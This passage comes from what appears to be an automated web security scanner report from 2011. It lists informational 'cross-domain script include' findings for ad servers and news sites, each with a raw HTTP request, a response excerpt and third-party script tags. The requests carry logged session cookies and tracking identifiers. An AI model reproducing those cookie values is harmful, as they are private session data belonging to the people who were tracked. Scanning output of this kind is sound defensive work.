//out+= '<script src="https://WaPo.netmng.com/?aid=069" type="text/javascript" language="javascript" defer="defer"></script>
...[SNIP]...

24. Cross-domain script include
There are 82 instances of this issue:


24.1. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.32

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /adi/N3941.InviteMedia/B5414127.32;sz=160x600;pc=[TPAS_ID];click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BNedOXxG-Te_sHMeXmgfvluHyCq3mhMIBhcPSjhf9072UVwAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00Njc1MzY0ODUyMTA5MDg4oAGrl7rtA7IBEXd3dy5ncmVlbmh1bGsubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly93d3cuZ3JlZW5odWxrLm5ldC9mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT&num=1&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fg&client=ca-pub-4675364852109088&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC0NjcxNgTxDIEcpJMkkKKLc0cMv18LbNL_Moygnwyep3NZWCaQcpKA0LzsvvzwPxAfpNgHSpiAjjcwMgUwTIDOvNCcHyDQDMs2MLCwtawFithu3%26redirectURL%3D;ord=Tb4RXwAHNm8K5ovHrlhLbw==? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4675364852109088&output=html&h=600&slotname=7606683569&w=160&lmt=1304337917&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912584&bpp=8&shv=r20110427&jsv=r20110427&prev_slotnames=8870801362%2C8870801362&correlator=1304319912561&frm=0&adk=645557951&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=3&dtd=5628&xpc=DefJdIvudC&p=http%3A//www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 02:25:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8795

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Fri Apr 29 11:56:20 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
</noscript>
<script src="http://cdn.doubleverify.com/script308.js?agnc=930213&cmp=5414127&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=62578498&advid=1620481&sid=877237&adid="></script>
...[SNIP]...

24.2. http://ads-vrx.adbrite.com/adserver/display_iab_ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads-vrx.adbrite.com
Path:   /adserver/display_iab_ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adserver/display_iab_ads?sid=1794248&title_color=0000FF&text_color=000000&background_color=fcfaf3&border_color=fcfaf3&url_color=008000&newwin=0&zs=3330305f323530&width=300&height=250&xb=13667710&xbg=12857574&xfb=0&xv=1844495&xat=1&xbt=CpcBidImpl&xc=302e30303131&xe=302e3432&xcc=a4764a3f7ec8a41fd02b6ccdfd0dc845&xdv=false&xg=4b0f5fc0-6071-4bfe-8570-deb210507cbe&xap=0&xaps=0&xfp=BELOW&url=http%3A%2F%2Fwebsiteprice.net%2Fresult%2F%3Fid%3D65934 HTTP/1.1
Host: ads-vrx.adbrite.com
Proxy-Connection: keep-alive
Referer: http://websiteprice.net/result/?id=65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; srh="1%3Aq64FAA%3D%3D"; b="%3A%3A12gg8%2C12ggb%2C6e73"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjYKBjc2MjcwMRDg1_T5CRiAk-zNEyIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKFAoGNzgyNjA2EIC7iqMKGICT7M0TCjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; ut="1%3AHY5LEoMgEAXvMmsWDEZDeRtQI1YmEMBPqePdg9l29et6J6wK2hPew76F1GdooXNOj1GalTHSOH9YsRXZqN7cwOnMyJJxCVLEWB1bobpKVDSsRVY5IeN3f3nPZYDzITINRMWy8xb4yY2tROeomfbm4Qvu5UJ3EgRY4%2F2Qpv8NuK4f"; vsd=0@4@4dbe1166@websiteprice.net; fq="7l04r%2C1uo0%7Clkjpsr%2C84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjpss%2C84y2m%2C1uo0%7Clkjpt2%2C826ke%2C1uo0%7Clkjpsr"; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: text/html
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 02 May 2011 02:22:39 GMT
Content-Length: 980

<html><head></head><body leftmargin=0 topmargin=0 bgcolor="#FFFFFF"> <!-- eyewonder -->

<script language="JavaScript" src="http://guru.sitescout.com/tag.jsp?pid=66738FF&w=300&h=250&rnd=6848350&cm=http://click.adbrite.com/c/CvMCxYEuuBnWZTkIPVmBPewA4aV85MACQqj-YPCxxOMtfurS0IoFdYEHJcpUeMvrhctEXenWGVbDxpsbhT8_FvIMQKcHOIQF4Q9tBQ7Y-8JCDDEBM-kKSZeG7SmDOwbwhtbSgbdw7sLPPEgfvXMKd5P8oWCXY9D2-QHOfg6pX0b9LTtaTQI8E9Y1hXVck9VT8EmRAoIKD-Hz3s10ZMQecjaqU1-wroyCzUm10G_MBmfksRDzlEfApCpYRe4nJ4H9-0oXD48jRc9TSMbik2vsesqhIsvKOysmRbXe1I-7Vja6eSCJtFt5tcQrjLwvpdsi29oHYRBPhO6ykaJrFmFxpw4brKP1BrwMo-Dqb-G5ehLFlDqZiwTbRSvQV1mlJyVdP_ARS3vHOjjU3Z9ymM3HNPdLFfWpeZuSmRAa7IevnP633WFtNFL5DuYwFuBIXYIP2GUCTEZxixKIhDFXNJ-gBTmXDtBT1blNlYPRxJB5sCt1ixJxrn4SEN9R-H60fWjJ_p2N9hBFksU/"></script>
...[SNIP]...

24.3. http://bizinformation.co/www.onlinemicrofiche.com

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bizinformation.co
Path:   /www.onlinemicrofiche.com

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /www.onlinemicrofiche.com HTTP/1.1
Host: bizinformation.co
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:11:00 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14247

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="t
...[SNIP]...
<link href="http://bizinformation.com/css/style_sp110.css" type="text/css" rel="stylesheet" /><script type="text/javascript" src="http://bizinformation.com/css/jquery.idTabs.min.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://www.google.com/jsapi?key=ABQIAAAAyYvrff9CIah5IlrtMcQtzhQOK5HbXcSpG3ciJJtshANN-4CjvxQayqUA7_6prGx46Q9UAcOdc7sk-w"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...

24.4. http://d1.openx.org/afr.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /afr.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /afr.php?resize=1&campaignid=246606&what=chi160x600&ct0=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBIsVPfQ--TffUN9q86QaO0KkvyMnAgAKQ3aCnJriw6u9EABABGAEgADgBUIDH4cQEYMnug4jwo-wSggEXY2EtcHViLTcyNTExNzM2MDIxMjU3NzWgAeDq_toDsgERd3d3LmphcGFuYXRvci5jb226AQoxNjB4NjAwX2FzyAEJ2gEtaHR0cDovL3d3dy5qYXBhbmF0b3IuY29tL2VsZXBoYW50L2xvZ2luLnBodG1smAKOAsACBMgCgOr2FqgDAegDvQL1AwAAAOQ%26num%3D1%26sig%3DAGiWqtwQa1xoRafBymiCbfwPHRB1hm9EPA%26client%3Dca-pub-7251173602125775%26adurl%3D;cb=1442324580& HTTP/1.1
Host: d1.openx.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=bba0cb56df6b6edbf6102c35304755de

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:07:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=bba0cb56df6b6edbf6102c35304755de; expires=Tue, 01-May-2012 02:07:47 GMT; path=/
Content-Length: 2280
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<body onload="MAX_adjustframe(window);">
<script src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2193540&PluID=0&w=160&h=600&5178448dd1&ncu=http://d1.openx.org/ck.php?oaparams=2__bannerid=522976__zoneid=0__OXLCA=1__cb=5178448dd1__r_id=bb886cd50eee7cc6d15eccca2981af76__r_ts=lkjpwz__oadest=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBIsVPfQ--TffUN9q86QaO0KkvyMnAgAKQ3aCnJriw6u9EABABGAEgADgBUIDH4cQEYMnug4jwo-wSggEXY2EtcHViLTcyNTExNzM2MDIxMjU3NzWgAeDq_toDsgERd3d3LmphcGFuYXRvci5jb226AQoxNjB4NjAwX2FzyAEJ2gEtaHR0cDovL3d3dy5qYXBhbmF0b3IuY29tL2VsZXBoYW50L2xvZ2luLnBodG1smAKOAsACBMgCgOr2FqgDAegDvQL1AwAAAOQ%26num%3D1%26sig%3DAGiWqtwQa1xoRafBymiCbfwPHRB1hm9EPA%26client%3Dca-pub-7251173602125775%26adurl%3D%3Bcb%3D1442324580http%253A%252F%252Fwww.zipcar.com%252Fwebchi3col75&ucm=true&ncu=$$%c$$"></script>
...[SNIP]...

24.5. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pagead/ads?client=ca-pub-4675364852109088&output=html&h=90&slotname=8870801362&w=728&lmt=1304337912&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912482&bpp=3&shv=r20110427&jsv=r20110427&correlator=1304319912561&frm=0&adk=2893163048&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=1&dtd=1173&xpc=ZURzYVvD5x&p=http%3A//www.greenhulk.net HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 02 May 2011 02:05:15 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 13601

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#5c9911;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

24.6. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1304328302&flash=10.2.154&url=file%3A%2F%2F%2FD%3A%2Fcdn%2Fexamples%2Fdork%2Fhttp-injection%2Fhttp-header-injection-dork-cwe-113-march-8-2011.html&dt=1304310301907&bpp=3&shv=r20110427&jsv=r20110427&correlator=1304310302224&frm=0&adk=1607234649&ga_vid=1507467887.1304310302&ga_sid=1304310302&ga_hid=1320224918&ga_fc=0&u_tz=-300&u_his=6&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=967&bih=887&fu=0&ifi=1&dtd=442&xpc=c6VTuxdnT3&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 01 May 2011 23:25:04 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 7893

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

24.7. http://insurancenewsnet.com/article.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://insurancenewsnet.com
Path:   /article.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /article.aspx?id=257992 HTTP/1.1
Host: insurancenewsnet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=600
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=1k3l4a55gy1fk4jf5xabtr45; path=/; HttpOnly
Set-Cookie: INNid=1k3l4a55gy1fk4jf5xabtr45; expires=Tue, 01-May-2012 23:33:25 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:33:25 GMT
Content-Length: 74743


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Insur
...[SNIP]...
leclick.net/adi/N4827.272700.8895614262621/B5117134.4;sz=164x200;ord=[timestamp]?" WIDTH=164 HEIGHT=200 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N4827.272700.8895614262621/B5117134.4;abr=!ie;sz=164x200;ord=[timestamp]?">
</SCRIPT>
...[SNIP]...
</div>
           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
</div><script src="http://cdn.js-kit.com/scripts/comments.js"></script>
...[SNIP]...
</script>
<script src="http://static.getclicky.com/js" type="text/javascript"></script>
...[SNIP]...

24.8. http://media.washingtonpost.com/wp-srv/ad/tiffany_manager.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.washingtonpost.com
Path:   /wp-srv/ad/tiffany_manager.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-srv/ad/tiffany_manager.js HTTP/1.1
Host: media.washingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WashingtonJobsSession=6zZRN9tGhpCv84LpLYbzSQp9QL2pZ6KRM7JFwNxyFRtwB9bjzDTH!1853811560; WPNIUCID=WPNI1304310786188.9974; mbox=check#true#1304310850|session#1304310789089-468386#1304312650

Response

HTTP/1.1 200 OK
Server: Web Server
Content-Type: application/x-javascript
Last-Modified: Fri, 04 Mar 2011 18:44:10 GMT
ETag: "5662-4d7132fa"
Vary: Accept-Encoding
Cache-Control: max-age=86400
Expires: Mon, 02 May 2011 23:33:14 GMT
Date: Sun, 01 May 2011 23:33:14 GMT
Connection: close
Content-Length: 22114

var wpTiles = {
   tools : {
       log : function (a) { if (console) { console.log(a); } },
       commercialNode : (typeof commercialNode !== 'undefined') ? commercialNode:'technology',
       urlCheck : (typeof
...[SNIP]...
<img src="http://altfarm.mediaplex.com/ad/tr/14302-93014-2151-0?mpt='+wpTiles.tools.ord+'" alt="" style="display:none;width:1px;height:1px;border:0" /><script src="http://puma.vizu.com/cdn/00/00/06/21/tracking_only.js?adid=logo;siteid=washingtonpost;" type="text/javascript"></script>
...[SNIP]...

24.9. http://news.yahoo.com/s/prweb/20110427/bs_prweb/prweb5276794

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.yahoo.com
Path:   /s/prweb/20110427/bs_prweb/prweb5276794

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /s/prweb/20110427/bs_prweb/prweb5276794 HTTP/1.1
Host: news.yahoo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=8khj7j56qmjsh&b=3&s=7r; F=a=I9dRHdwMvTUKaBDhiVaH.UVtn.V7Y30KdDQIYBG7obdok_NZIfFNBlUZT4rlwq78V5tRt3I-&b=WFvT; YLS=v=1&p=1&n=9

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:33:12 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: MwPhCom_degraded_status=false; path=/
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Cache-Control: private
Age: 2
Proxy-Connection: close
Server: YTS/1.19.4

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US">
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">

<!--
...[SNIP]...
<!-- end: #doc4 -->


<script type="text/javascript" src="http://l.yimg.com/d/combo?yui/2.7.0/build/yahoo/yahoo-min.js&yui/2.7.0/build/event/event-min.js&yui/2.7.0/build/dom/dom-min.js&yui/2.7.0/build/get/get-min.js&yui/2.7.0/build/animation/animation-min.js&yui/2.7.0/build/json/json-min.js&yui/2.7.0/build/connection/connection-min.js&yui/2.7.0/build/datasource/datasource-min.js&yui/2.7.0/build/selector/selector-min.js&yui/2.7.0/build/cookie/cookie-min.js&yui/2.7.0/build/container/container-min.js&media/m/infinite_browse/mw_infinite_browse_carousel-min-3870.js&yui/2.7.0/build/element/element-min.js&yui/2.7.0/build/carousel/carousel-min.js&news/p/story/generic/infinite-browse-carousel-ult-min-59548.js&uh/15/js/uh_rsa-1.0.9.js&news/p/common/generic/common_base_rollup-min-44697.js&news/p/common/generic/common_page_rollup-min-26267.js&media/m/location_widget/location_widget-min-22834.js&news/p/common/generic/filter-reload-local-viewer-filter_init-reload_init-min-38036.js&s5/miniassist_200912081429.js&news/p/common/generic/foundation/im-min-6761.js&news/p/common/generic/foundation/popup-min-12622.js&news/p/common/generic/im_init-min-12623.js&news/p/common/generic/popup_init-min-12623.js&news/p/story/generic/story-min-54515.js&news/p/story/generic/aska-min-44740.js&news/p/common/generic/yui3-min-36486.js&yui/2.7.0/build/imageloader/imageloader-min.js&yui/2.7.0/build/container/container_core-min.js&media/phugc/mwphcom_min_r1413.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://l.yimg.com/d/combo?media/m/infinite_browse/mw_infinite_browse-min-3638.js&media/m/infinite_browse/yui.widget.jsonabortable-min-3638.js&media/m/infinite_browse/yui.util.imageresizecrop-min-3378.js&media/m/social_buttons/social-buttons-easy-min-3950.js"></script>
...[SNIP]...

24.10. http://usjobsresource.com/3/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usjobsresource.com
Path:   /3/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /3/?s=31s-2100u HTTP/1.1
Host: usjobsresource.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:33:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15206


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
</script>
<script src="http://j.maxmind.com/app/geoip.js"></script>
...[SNIP]...
</script> <script id="mstag_tops" type="text/javascript" src="//flex.atdmt.com/mstag/site/7a8a3b31-6681-4d89-825a-d834c1016c24/mstag.js"></script>
...[SNIP]...

24.11. http://websiteprice.net/result/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://websiteprice.net
Path:   /result/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /result/?id=65934 HTTP/1.1
Host: websiteprice.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
